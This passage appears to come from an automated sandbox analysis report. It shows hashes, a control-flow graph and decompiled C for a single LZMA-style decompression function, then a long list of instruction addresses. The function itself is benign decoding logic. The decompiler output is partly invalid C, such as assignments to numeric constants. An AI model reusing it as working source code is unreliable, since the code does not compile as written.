                            • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                            • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406BB0 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 538 406bb0-406bd3 539 406bd5-406bd8 538->539 540 406bdd-406be0 538->540 541 4075fd-407601 539->541 542 406be3-406bec 540->542 543 406bf2 542->543 544 4075fa 542->544 545 406bf9-406bfd 543->545 546 406d39-4073e0 543->546 547 406c9e-406ca2 543->547 548 406d0e-406d12 543->548 544->541 549 406c03-406c10 545->549 550 4075e5-4075f8 545->550 556 4073e2-4073f8 546->556 557 4073fa-407410 546->557 554 406ca8-406cc1 547->554 555 40754e-407558 547->555 551 406d18-406d2c 548->551 552 40755d-407567 548->552 549->544 558 406c16-406c5c 549->558 550->541 559 406d2f-406d37 551->559 552->550 560 406cc4-406cc8 554->560 555->550 561 407413-40741a 556->561 557->561 562 406c84-406c86 558->562 563 406c5e-406c62 558->563 559->546 559->548 560->547 564 406cca-406cd0 560->564 567 407441-40744d 561->567 568 40741c-407420 561->568 571 406c94-406c9c 562->571 572 406c88-406c92 562->572 569 406c64-406c67 GlobalFree 563->569 570 406c6d-406c7b GlobalAlloc 563->570 565 406cd2-406cd9 564->565 566 406cfa-406d0c 564->566 573 406ce4-406cf4 GlobalAlloc 565->573 574 406cdb-406cde GlobalFree 565->574 566->559 567->542 575 407426-40743e 568->575 576 4075cf-4075d9 568->576 569->570 570->544 578 406c81 570->578 571->560 572->571 572->572 573->544 573->566 574->573 575->567 576->550 578->562
                            C-Code - Quality: 98%
                            			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                            0x00406bc0
                            0x00406bc7
                            0x00406bcd
                            0x00406bd3
                            0x00000000
                            0x00406bd7
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bf9
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c0e
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c59
                            0x00406c5c
                            0x00406c84
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c5e
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c76
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406ccd
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd2
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cef
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d35
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073dd
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x00407413
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x00000000
                            0x004075cf
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743b
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x00000000
                            0x00406dec
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
